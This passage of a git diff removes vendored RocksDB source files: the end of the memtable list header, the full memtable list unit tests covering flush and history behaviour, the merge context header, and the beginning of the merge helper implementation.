-  size_t ApproximateUnflushedMemTablesMemoryUsage();
-
-  // Returns an estimate of the timestamp of the earliest key.
-  uint64_t ApproximateOldestKeyTime() const;
-
-  // Request a flush of all existing memtables to storage.  This will
-  // cause future calls to IsFlushPending() to return true if this list is
-  // non-empty (regardless of the min_write_buffer_number_to_merge
-  // parameter). This flush request will persist until the next time
-  // PickMemtablesToFlush() is called.
-  void FlushRequested() { flush_requested_ = true; }
-
-  bool HasFlushRequested() { return flush_requested_; }
-
-  // Copying allowed
-  // MemTableList(const MemTableList&);
-  // void operator=(const MemTableList&);
-
-  size_t* current_memory_usage() { return &current_memory_usage_; }
-
-  uint64_t GetMinLogContainingPrepSection();
-
- private:
-  // DB mutex held
-  void InstallNewVersion();
-
-  const int min_write_buffer_number_to_merge_;
-
-  MemTableListVersion* current_;
-
-  // the number of elements that still need flushing
-  int num_flush_not_started_;
-
-  // committing in progress
-  bool commit_in_progress_;
-
-  // Requested a flush of all memtables to storage
-  bool flush_requested_;
-
-  // The current memory usage.
-  size_t current_memory_usage_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/memtable_list_test.cc b/thirdparty/rocksdb/db/memtable_list_test.cc
deleted file mode 100644
index 30e5166..0000000
--- a/thirdparty/rocksdb/db/memtable_list_test.cc
+++ /dev/null
@@ -1,615 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/memtable_list.h"
-#include <algorithm>
-#include <string>
-#include <vector>
-#include "db/merge_context.h"
-#include "db/range_del_aggregator.h"
-#include "db/version_set.h"
-#include "db/write_controller.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class MemTableListTest : public testing::Test {
- public:
-  std::string dbname;
-  DB* db;
-  Options options;
-
-  MemTableListTest() : db(nullptr) {
-    dbname = test::TmpDir() + "/memtable_list_test";
-  }
-
-  // Create a test db if not yet created
-  void CreateDB() {
-    if (db == nullptr) {
-      options.create_if_missing = true;
-      DestroyDB(dbname, options);
-      Status s = DB::Open(options, dbname, &db);
-      EXPECT_OK(s);
-    }
-  }
-
-  ~MemTableListTest() {
-    if (db) {
-      delete db;
-      DestroyDB(dbname, options);
-    }
-  }
-
-  // Calls MemTableList::InstallMemtableFlushResults() and sets up all
-  // structures needed to call this function.
-  Status Mock_InstallMemtableFlushResults(
-      MemTableList* list, const MutableCFOptions& mutable_cf_options,
-      const autovector<MemTable*>& m, autovector<MemTable*>* to_delete) {
-    // Create a mock Logger
-    test::NullLogger logger;
-    LogBuffer log_buffer(DEBUG_LEVEL, &logger);
-
-    // Create a mock VersionSet
-    DBOptions db_options;
-    ImmutableDBOptions immutable_db_options(db_options);
-    EnvOptions env_options;
-    shared_ptr<Cache> table_cache(NewLRUCache(50000, 16));
-    WriteBufferManager write_buffer_manager(db_options.db_write_buffer_size);
-    WriteController write_controller(10000000u);
-
-    CreateDB();
-    VersionSet versions(dbname, &immutable_db_options, env_options,
-                        table_cache.get(), &write_buffer_manager,
-                        &write_controller);
-
-    // Create mock default ColumnFamilyData
-    ColumnFamilyOptions cf_options;
-    std::vector<ColumnFamilyDescriptor> column_families;
-    column_families.emplace_back(kDefaultColumnFamilyName, cf_options);
-    EXPECT_OK(versions.Recover(column_families, false));
-
-    auto column_family_set = versions.GetColumnFamilySet();
-    auto cfd = column_family_set->GetColumnFamily(0);
-    EXPECT_TRUE(cfd != nullptr);
-
-    // Create dummy mutex.
-    InstrumentedMutex mutex;
-    InstrumentedMutexLock l(&mutex);
-
-    return list->InstallMemtableFlushResults(cfd, mutable_cf_options, m,
-                                             &versions, &mutex, 1, to_delete,
-                                             nullptr, &log_buffer);
-  }
-};
-
-TEST_F(MemTableListTest, Empty) {
-  // Create an empty MemTableList and validate basic functions.
-  MemTableList list(1, 0);
-
-  ASSERT_EQ(0, list.NumNotFlushed());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-  ASSERT_FALSE(list.IsFlushPending());
-
-  autovector<MemTable*> mems;
-  list.PickMemtablesToFlush(&mems);
-  ASSERT_EQ(0, mems.size());
-
-  autovector<MemTable*> to_delete;
-  list.current()->Unref(&to_delete);
-  ASSERT_EQ(0, to_delete.size());
-}
-
-TEST_F(MemTableListTest, GetTest) {
-  // Create MemTableList
-  int min_write_buffer_number_to_merge = 2;
-  int max_write_buffer_number_to_maintain = 0;
-  MemTableList list(min_write_buffer_number_to_merge,
-                    max_write_buffer_number_to_maintain);
-
-  SequenceNumber seq = 1;
-  std::string value;
-  Status s;
-  MergeContext merge_context;
-  InternalKeyComparator ikey_cmp(options.comparator);
-  RangeDelAggregator range_del_agg(ikey_cmp, {} /* snapshots */);
-  autovector<MemTable*> to_delete;
-
-  LookupKey lkey("key1", seq);
-  bool found = list.current()->Get(lkey, &value, &s, &merge_context,
-                                   &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  // Create a MemTable
-  InternalKeyComparator cmp(BytewiseComparator());
-  auto factory = std::make_shared<SkipListFactory>();
-  options.memtable_factory = factory;
-  ImmutableCFOptions ioptions(options);
-
-  WriteBufferManager wb(options.db_write_buffer_size);
-  MemTable* mem = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb,
-                               kMaxSequenceNumber, 0 /* column_family_id */);
-  mem->Ref();
-
-  // Write some keys to this memtable.
-  mem->Add(++seq, kTypeDeletion, "key1", "");
-  mem->Add(++seq, kTypeValue, "key2", "value2");
-  mem->Add(++seq, kTypeValue, "key1", "value1");
-  mem->Add(++seq, kTypeValue, "key2", "value2.2");
-
-  // Fetch the newly written keys
-  merge_context.Clear();
-  found = mem->Get(LookupKey("key1", seq), &value, &s, &merge_context,
-                   &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ(value, "value1");
-
-  merge_context.Clear();
-  found = mem->Get(LookupKey("key1", 2), &value, &s, &merge_context,
-                   &range_del_agg, ReadOptions());
-  // MemTable found out that this key is *not* found (at this sequence#)
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = mem->Get(LookupKey("key2", seq), &value, &s, &merge_context,
-                   &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ(value, "value2.2");
-
-  ASSERT_EQ(4, mem->num_entries());
-  ASSERT_EQ(1, mem->num_deletes());
-
-  // Add memtable to list
-  list.Add(mem, &to_delete);
-
-  SequenceNumber saved_seq = seq;
-
-  // Create another memtable and write some keys to it
-  WriteBufferManager wb2(options.db_write_buffer_size);
-  MemTable* mem2 = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb2,
-                                kMaxSequenceNumber, 0 /* column_family_id */);
-  mem2->Ref();
-
-  mem2->Add(++seq, kTypeDeletion, "key1", "");
-  mem2->Add(++seq, kTypeValue, "key2", "value2.3");
-
-  // Add second memtable to list
-  list.Add(mem2, &to_delete);
-
-  // Fetch keys via MemTableList
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key1", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key1", saved_seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ("value1", value);
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ(value, "value2.3");
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", 1), &value, &s, &merge_context,
-                              &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  ASSERT_EQ(2, list.NumNotFlushed());
-
-  list.current()->Unref(&to_delete);
-  for (MemTable* m : to_delete) {
-    delete m;
-  }
-}
-
-TEST_F(MemTableListTest, GetFromHistoryTest) {
-  // Create MemTableList
-  int min_write_buffer_number_to_merge = 2;
-  int max_write_buffer_number_to_maintain = 2;
-  MemTableList list(min_write_buffer_number_to_merge,
-                    max_write_buffer_number_to_maintain);
-
-  SequenceNumber seq = 1;
-  std::string value;
-  Status s;
-  MergeContext merge_context;
-  InternalKeyComparator ikey_cmp(options.comparator);
-  RangeDelAggregator range_del_agg(ikey_cmp, {} /* snapshots */);
-  autovector<MemTable*> to_delete;
-
-  LookupKey lkey("key1", seq);
-  bool found = list.current()->Get(lkey, &value, &s, &merge_context,
-                                   &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  // Create a MemTable
-  InternalKeyComparator cmp(BytewiseComparator());
-  auto factory = std::make_shared<SkipListFactory>();
-  options.memtable_factory = factory;
-  ImmutableCFOptions ioptions(options);
-
-  WriteBufferManager wb(options.db_write_buffer_size);
-  MemTable* mem = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb,
-                               kMaxSequenceNumber, 0 /* column_family_id */);
-  mem->Ref();
-
-  // Write some keys to this memtable.
-  mem->Add(++seq, kTypeDeletion, "key1", "");
-  mem->Add(++seq, kTypeValue, "key2", "value2");
-  mem->Add(++seq, kTypeValue, "key2", "value2.2");
-
-  // Fetch the newly written keys
-  merge_context.Clear();
-  found = mem->Get(LookupKey("key1", seq), &value, &s, &merge_context,
-                   &range_del_agg, ReadOptions());
-  // MemTable found out that this key is *not* found (at this sequence#)
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = mem->Get(LookupKey("key2", seq), &value, &s, &merge_context,
-                   &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ(value, "value2.2");
-
-  // Add memtable to list
-  list.Add(mem, &to_delete);
-  ASSERT_EQ(0, to_delete.size());
-
-  // Fetch keys via MemTableList
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key1", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ("value2.2", value);
-
-  // Flush this memtable from the list.
-  // (It will then be a part of the memtable history).
-  autovector<MemTable*> to_flush;
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(1, to_flush.size());
-
-  s = Mock_InstallMemtableFlushResults(&list, MutableCFOptions(options),
-                                       to_flush, &to_delete);
-  ASSERT_OK(s);
-  ASSERT_EQ(0, list.NumNotFlushed());
-  ASSERT_EQ(1, list.NumFlushed());
-  ASSERT_EQ(0, to_delete.size());
-
-  // Verify keys are no longer in MemTableList
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key1", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  // Verify keys are present in history
-  merge_context.Clear();
-  found = list.current()->GetFromHistory(LookupKey("key1", seq), &value, &s,
-                                         &merge_context, &range_del_agg,
-                                         ReadOptions());
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = list.current()->GetFromHistory(LookupKey("key2", seq), &value, &s,
-                                         &merge_context, &range_del_agg,
-                                         ReadOptions());
-  ASSERT_TRUE(found);
-  ASSERT_EQ("value2.2", value);
-
-  // Create another memtable and write some keys to it
-  WriteBufferManager wb2(options.db_write_buffer_size);
-  MemTable* mem2 = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb2,
-                                kMaxSequenceNumber, 0 /* column_family_id */);
-  mem2->Ref();
-
-  mem2->Add(++seq, kTypeDeletion, "key1", "");
-  mem2->Add(++seq, kTypeValue, "key3", "value3");
-
-  // Add second memtable to list
-  list.Add(mem2, &to_delete);
-  ASSERT_EQ(0, to_delete.size());
-
-  to_flush.clear();
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(1, to_flush.size());
-
-  // Flush second memtable
-  s = Mock_InstallMemtableFlushResults(&list, MutableCFOptions(options),
-                                       to_flush, &to_delete);
-  ASSERT_OK(s);
-  ASSERT_EQ(0, list.NumNotFlushed());
-  ASSERT_EQ(2, list.NumFlushed());
-  ASSERT_EQ(0, to_delete.size());
-
-  // Add a third memtable to push the first memtable out of the history
-  WriteBufferManager wb3(options.db_write_buffer_size);
-  MemTable* mem3 = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb3,
-                                kMaxSequenceNumber, 0 /* column_family_id */);
-  mem3->Ref();
-  list.Add(mem3, &to_delete);
-  ASSERT_EQ(1, list.NumNotFlushed());
-  ASSERT_EQ(1, list.NumFlushed());
-  ASSERT_EQ(1, to_delete.size());
-
-  // Verify keys are no longer in MemTableList
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key1", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key3", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  // Verify that the second memtable's keys are in the history
-  merge_context.Clear();
-  found = list.current()->GetFromHistory(LookupKey("key1", seq), &value, &s,
-                                         &merge_context, &range_del_agg,
-                                         ReadOptions());
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = list.current()->GetFromHistory(LookupKey("key3", seq), &value, &s,
-                                         &merge_context, &range_del_agg,
-                                         ReadOptions());
-  ASSERT_TRUE(found);
-  ASSERT_EQ("value3", value);
-
-  // Verify that key2 from the first memtable is no longer in the history
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  // Cleanup
-  list.current()->Unref(&to_delete);
-  ASSERT_EQ(3, to_delete.size());
-  for (MemTable* m : to_delete) {
-    delete m;
-  }
-}
-
-TEST_F(MemTableListTest, FlushPendingTest) {
-  const int num_tables = 5;
-  SequenceNumber seq = 1;
-  Status s;
-
-  auto factory = std::make_shared<SkipListFactory>();
-  options.memtable_factory = factory;
-  ImmutableCFOptions ioptions(options);
-  InternalKeyComparator cmp(BytewiseComparator());
-  WriteBufferManager wb(options.db_write_buffer_size);
-  autovector<MemTable*> to_delete;
-
-  // Create MemTableList
-  int min_write_buffer_number_to_merge = 3;
-  int max_write_buffer_number_to_maintain = 7;
-  MemTableList list(min_write_buffer_number_to_merge,
-                    max_write_buffer_number_to_maintain);
-
-  // Create some MemTables
-  std::vector<MemTable*> tables;
-  MutableCFOptions mutable_cf_options(options);
-  for (int i = 0; i < num_tables; i++) {
-    MemTable* mem = new MemTable(cmp, ioptions, mutable_cf_options, &wb,
-                                 kMaxSequenceNumber, 0 /* column_family_id */);
-    mem->Ref();
-
-    std::string value;
-    MergeContext merge_context;
-
-    mem->Add(++seq, kTypeValue, "key1", ToString(i));
-    mem->Add(++seq, kTypeValue, "keyN" + ToString(i), "valueN");
-    mem->Add(++seq, kTypeValue, "keyX" + ToString(i), "value");
-    mem->Add(++seq, kTypeValue, "keyM" + ToString(i), "valueM");
-    mem->Add(++seq, kTypeDeletion, "keyX" + ToString(i), "");
-
-    tables.push_back(mem);
-  }
-
-  // Nothing to flush
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-  autovector<MemTable*> to_flush;
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(0, to_flush.size());
-
-  // Request a flush even though there is nothing to flush
-  list.FlushRequested();
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Attempt to 'flush' to clear request for flush
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(0, to_flush.size());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Request a flush again
-  list.FlushRequested();
-  // No flush pending since the list is empty.
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Add 2 tables
-  list.Add(tables[0], &to_delete);
-  list.Add(tables[1], &to_delete);
-  ASSERT_EQ(2, list.NumNotFlushed());
-  ASSERT_EQ(0, to_delete.size());
-
-  // Even though we have less than the minimum to flush, a flush is
-  // pending since we had previously requested a flush and never called
-  // PickMemtablesToFlush() to clear the flush.
-  ASSERT_TRUE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Pick tables to flush
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(2, to_flush.size());
-  ASSERT_EQ(2, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Revert flush
-  list.RollbackMemtableFlush(to_flush, 0);
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-  to_flush.clear();
-
-  // Add another table
-  list.Add(tables[2], &to_delete);
-  // We now have the minimum to flush regardles of whether FlushRequested()
-  // was called.
-  ASSERT_TRUE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-  ASSERT_EQ(0, to_delete.size());
-
-  // Pick tables to flush
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(3, to_flush.size());
-  ASSERT_EQ(3, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Pick tables to flush again
-  autovector<MemTable*> to_flush2;
-  list.PickMemtablesToFlush(&to_flush2);
-  ASSERT_EQ(0, to_flush2.size());
-  ASSERT_EQ(3, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Add another table
-  list.Add(tables[3], &to_delete);
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-  ASSERT_EQ(0, to_delete.size());
-
-  // Request a flush again
-  list.FlushRequested();
-  ASSERT_TRUE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Pick tables to flush again
-  list.PickMemtablesToFlush(&to_flush2);
-  ASSERT_EQ(1, to_flush2.size());
-  ASSERT_EQ(4, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Rollback first pick of tables
-  list.RollbackMemtableFlush(to_flush, 0);
-  ASSERT_TRUE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-  to_flush.clear();
-
-  // Add another tables
-  list.Add(tables[4], &to_delete);
-  ASSERT_EQ(5, list.NumNotFlushed());
-  // We now have the minimum to flush regardles of whether FlushRequested()
-  ASSERT_TRUE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-  ASSERT_EQ(0, to_delete.size());
-
-  // Pick tables to flush
-  list.PickMemtablesToFlush(&to_flush);
-  // Should pick 4 of 5 since 1 table has been picked in to_flush2
-  ASSERT_EQ(4, to_flush.size());
-  ASSERT_EQ(5, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Pick tables to flush again
-  autovector<MemTable*> to_flush3;
-  ASSERT_EQ(0, to_flush3.size());  // nothing not in progress of being flushed
-  ASSERT_EQ(5, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Flush the 4 memtables that were picked in to_flush
-  s = Mock_InstallMemtableFlushResults(&list, MutableCFOptions(options),
-                                       to_flush, &to_delete);
-  ASSERT_OK(s);
-
-  // Note:  now to_flush contains tables[0,1,2,4].  to_flush2 contains
-  // tables[3].
-  // Current implementation will only commit memtables in the order they were
-  // created.  So InstallMemtableFlushResults will install the first 3 tables
-  // in to_flush and stop when it encounters a table not yet flushed.
-  ASSERT_EQ(2, list.NumNotFlushed());
-  int num_in_history = std::min(3, max_write_buffer_number_to_maintain);
-  ASSERT_EQ(num_in_history, list.NumFlushed());
-  ASSERT_EQ(5 - list.NumNotFlushed() - num_in_history, to_delete.size());
-
-  // Request a flush again. Should be nothing to flush
-  list.FlushRequested();
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Flush the 1 memtable that was picked in to_flush2
-  s = MemTableListTest::Mock_InstallMemtableFlushResults(
-      &list, MutableCFOptions(options), to_flush2, &to_delete);
-  ASSERT_OK(s);
-
-  // This will actually install 2 tables.  The 1 we told it to flush, and also
-  // tables[4] which has been waiting for tables[3] to commit.
-  ASSERT_EQ(0, list.NumNotFlushed());
-  num_in_history = std::min(5, max_write_buffer_number_to_maintain);
-  ASSERT_EQ(num_in_history, list.NumFlushed());
-  ASSERT_EQ(5 - list.NumNotFlushed() - num_in_history, to_delete.size());
-
-  for (const auto& m : to_delete) {
-    // Refcount should be 0 after calling InstallMemtableFlushResults.
-    // Verify this, by Ref'ing then UnRef'ing:
-    m->Ref();
-    ASSERT_EQ(m, m->Unref());
-    delete m;
-  }
-  to_delete.clear();
-
-  list.current()->Unref(&to_delete);
-  int to_delete_size = std::min(5, max_write_buffer_number_to_maintain);
-  ASSERT_EQ(to_delete_size, to_delete.size());
-
-  for (const auto& m : to_delete) {
-    // Refcount should be 0 after calling InstallMemtableFlushResults.
-    // Verify this, by Ref'ing then UnRef'ing:
-    m->Ref();
-    ASSERT_EQ(m, m->Unref());
-    delete m;
-  }
-  to_delete.clear();
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/merge_context.h b/thirdparty/rocksdb/db/merge_context.h
deleted file mode 100644
index 5e75e09..0000000
--- a/thirdparty/rocksdb/db/merge_context.h
+++ /dev/null
@@ -1,116 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include <string>
-#include <vector>
-#include "db/dbformat.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-const std::vector<Slice> empty_operand_list;
-
-// The merge context for merging a user key.
-// When doing a Get(), DB will create such a class and pass it when
-// issuing Get() operation to memtables and version_set. The operands
-// will be fetched from the context when issuing partial of full merge.
-class MergeContext {
- public:
-  // Clear all the operands
-  void Clear() {
-    if (operand_list_) {
-      operand_list_->clear();
-      copied_operands_->clear();
-    }
-  }
-
-  // Push a merge operand
-  void PushOperand(const Slice& operand_slice, bool operand_pinned = false) {
-    Initialize();
-    SetDirectionBackward();
-
-    if (operand_pinned) {
-      operand_list_->push_back(operand_slice);
-    } else {
-      // We need to have our own copy of the operand since it's not pinned
-      copied_operands_->emplace_back(
-          new std::string(operand_slice.data(), operand_slice.size()));
-      operand_list_->push_back(*copied_operands_->back());
-    }
-  }
-
-  // Push back a merge operand
-  void PushOperandBack(const Slice& operand_slice,
-                       bool operand_pinned = false) {
-    Initialize();
-    SetDirectionForward();
-
-    if (operand_pinned) {
-      operand_list_->push_back(operand_slice);
-    } else {
-      // We need to have our own copy of the operand since it's not pinned
-      copied_operands_->emplace_back(
-          new std::string(operand_slice.data(), operand_slice.size()));
-      operand_list_->push_back(*copied_operands_->back());
-    }
-  }
-
-  // return total number of operands in the list
-  size_t GetNumOperands() const {
-    if (!operand_list_) {
-      return 0;
-    }
-    return operand_list_->size();
-  }
-
-  // Get the operand at the index.
-  Slice GetOperand(int index) {
-    assert(operand_list_);
-
-    SetDirectionForward();
-    return (*operand_list_)[index];
-  }
-
-  // Return all the operands.
-  const std::vector<Slice>& GetOperands() {
-    if (!operand_list_) {
-      return empty_operand_list;
-    }
-
-    SetDirectionForward();
-    return *operand_list_;
-  }
-
- private:
-  void Initialize() {
-    if (!operand_list_) {
-      operand_list_.reset(new std::vector<Slice>());
-      copied_operands_.reset(new std::vector<std::unique_ptr<std::string>>());
-    }
-  }
-
-  void SetDirectionForward() {
-    if (operands_reversed_ == true) {
-      std::reverse(operand_list_->begin(), operand_list_->end());
-      operands_reversed_ = false;
-    }
-  }
-
-  void SetDirectionBackward() {
-    if (operands_reversed_ == false) {
-      std::reverse(operand_list_->begin(), operand_list_->end());
-      operands_reversed_ = true;
-    }
-  }
-
-  // List of operands
-  std::unique_ptr<std::vector<Slice>> operand_list_;
-  // Copy of operands that are not pinned.
-  std::unique_ptr<std::vector<std::unique_ptr<std::string>>> copied_operands_;
-  bool operands_reversed_ = true;
-};
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/merge_helper.cc b/thirdparty/rocksdb/db/merge_helper.cc
deleted file mode 100644
index 55f8254..0000000
--- a/thirdparty/rocksdb/db/merge_helper.cc
+++ /dev/null
@@ -1,393 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/merge_helper.h"
-
-#include <stdio.h>
-#include <string>
-
-#include "db/dbformat.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/statistics.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/merge_operator.h"
-#include "table/internal_iterator.h"
-
-namespace rocksdb {
-
-MergeHelper::MergeHelper(Env* env, const Comparator* user_comparator,
-                         const MergeOperator* user_merge_operator,
-                         const CompactionFilter* compaction_filter,
-                         Logger* logger, bool assert_valid_internal_key,
-                         SequenceNumber latest_snapshot, int level,
-                         Statistics* stats,
-                         const std::atomic<bool>* shutting_down)
-    : env_(env),
-      user_comparator_(user_comparator),
-      user_merge_operator_(user_merge_operator),
-      compaction_filter_(compaction_filter),
-      shutting_down_(shutting_down),
-      logger_(logger),
-      assert_valid_internal_key_(assert_valid_internal_key),
-      allow_single_operand_(false),
-      latest_snapshot_(latest_snapshot),
-      level_(level),
-      keys_(),
-      filter_timer_(env_),
-      total_filter_time_(0U),
-      stats_(stats) {
-  assert(user_comparator_ != nullptr);
-  if (user_merge_operator_) {
-    allow_single_operand_ = user_merge_operator_->AllowSingleOperand();
-  }
-}
-
-Status MergeHelper::TimedFullMerge(const MergeOperator* merge_operator,
-                                   const Slice& key, const Slice* value,
-                                   const std::vector<Slice>& operands,
-                                   std::string* result, Logger* logger,
-                                   Statistics* statistics, Env* env,
-                                   Slice* result_operand,
-                                   bool update_num_ops_stats) {
-  assert(merge_operator != nullptr);
-
-  if (operands.size() == 0) {
-    assert(value != nullptr && result != nullptr);
-    result->assign(value->data(), value->size());
-    return Status::OK();
-  }
-
-  if (update_num_ops_stats) {
-    MeasureTime(statistics, READ_NUM_MERGE_OPERANDS,
-                static_cast<uint64_t>(operands.size()));
-  }
-
-  bool success;
-  Slice tmp_result_operand(nullptr, 0);
-  const MergeOperator::MergeOperationInput merge_in(key, value, operands,
-                                                    logger);
-  MergeOperator::MergeOperationOutput merge_out(*result, tmp_result_operand);
-  {
-    // Setup to time the merge
-    StopWatchNano timer(env, statistics != nullptr);
-    PERF_TIMER_GUARD(merge_operator_time_nanos);
-
-    // Do the merge
-    success = merge_operator->FullMergeV2(merge_in, &merge_out);
-
-    if (tmp_result_operand.data()) {
-      // FullMergeV2 result is an existing operand
-      if (result_operand != nullptr) {
-        *result_operand = tmp_result_operand;
-      } else {
-        result->assign(tmp_result_operand.data(), tmp_result_operand.size());
-      }
-    } else if (result_operand) {
-      *result_operand = Slice(nullptr, 0);
-    }
-
-    RecordTick(statistics, MERGE_OPERATION_TOTAL_TIME,
-               statistics ? timer.ElapsedNanos() : 0);
-  }
-
-  if (!success) {
-    RecordTick(statistics, NUMBER_MERGE_FAILURES);
-    return Status::Corruption("Error: Could not perform merge.");
-  }
-
-  return Status::OK();
-}
-
-// PRE:  iter points to the first merge type entry
-// POST: iter points to the first entry beyond the merge process (or the end)
-//       keys_, operands_ are updated to reflect the merge result.
-//       keys_ stores the list of keys encountered while merging.
-//       operands_ stores the list of merge operands encountered while merging.
-//       keys_[i] corresponds to operands_[i] for each i.
-Status MergeHelper::MergeUntil(InternalIterator* iter,
-                               RangeDelAggregator* range_del_agg,
-                               const SequenceNumber stop_before,
-                               const bool at_bottom) {
-  // Get a copy of the internal key, before it's invalidated by iter->Next()
-  // Also maintain the list of merge operands seen.
-  assert(HasOperator());
-  keys_.clear();
-  merge_context_.Clear();
